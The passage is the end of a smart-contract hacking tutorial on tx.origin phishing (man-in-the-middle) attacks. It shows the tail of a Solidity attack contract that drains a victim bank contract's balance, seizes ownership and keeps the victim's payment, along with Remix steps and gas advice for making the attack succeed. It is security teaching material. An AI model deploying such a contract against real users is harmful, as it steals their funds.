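        // would fail the check inside transferTo.
        bankInterface.transferTo(attackerAddress, address(bankInterface).balance);
        bankInterface.changeOwner(attackerAddress);
        // Keep the "payment" itself as well.
        attackerAddress.transfer(msg.value);
    }
}
```

To try it in Remix, deploy this from the attacker's account with the target's address, then switch to the owner's account, enter a value and use the "Transact" button under the deployed contract's low-level interactions with empty calldata. One caveat a real attacker has to plan around: receive() here makes two external calls, so it needs far more than the 2300 gas stipend that transfer() and send() forward. The victim must send from a wallet with a normal transaction gas limit (which Remix and most wallets estimate and supply); ether arriving via another contract's transfer() or send() would simply revert.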

 

I hope all of this makes sense. If you got stuck at any point during this walkthrough make sure to check out the video for a walkthrough of the lab and additional attack options.  

 

Phishing MITM Attack Walk Through: 





Smart Contract Hacking - 0x10 - Man In The Middle(MITM) Phishing Attacks Via TX.Origin Authorization.mp4 from Console Cowboys on Vimeo.


References

Github code for this chapter:  https://github.com/cclabsInc/BlockChainExploitation/tree/master/2020_BlockchainFreeCourse/Tx.Origin
